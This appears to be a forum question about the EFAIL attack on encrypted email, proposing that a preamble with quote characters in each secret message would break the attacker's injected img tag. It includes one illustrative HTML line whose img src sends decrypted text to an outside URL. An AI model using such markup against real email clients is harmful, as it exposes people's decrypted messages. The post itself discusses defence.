The way I understand EFAIL, the attack works because email clients can be coerced into concatenating the decrypted message into text supplied by the attacker to result in an URL.
But wouldn't it be a counter-measure to use a suitable preamble with each secret message sent, such as
nice try " '
Secret meeting
Tomorrow 9pm
? The way I understand the attack(s), this would result in something like
<img src="http://efail.de/nice%20try%" ' Secret meeting Tomorrow 9pm">
i.e., an img
tag that is probably not even valid and exfiltrates only the initial "nice try" to the attacker.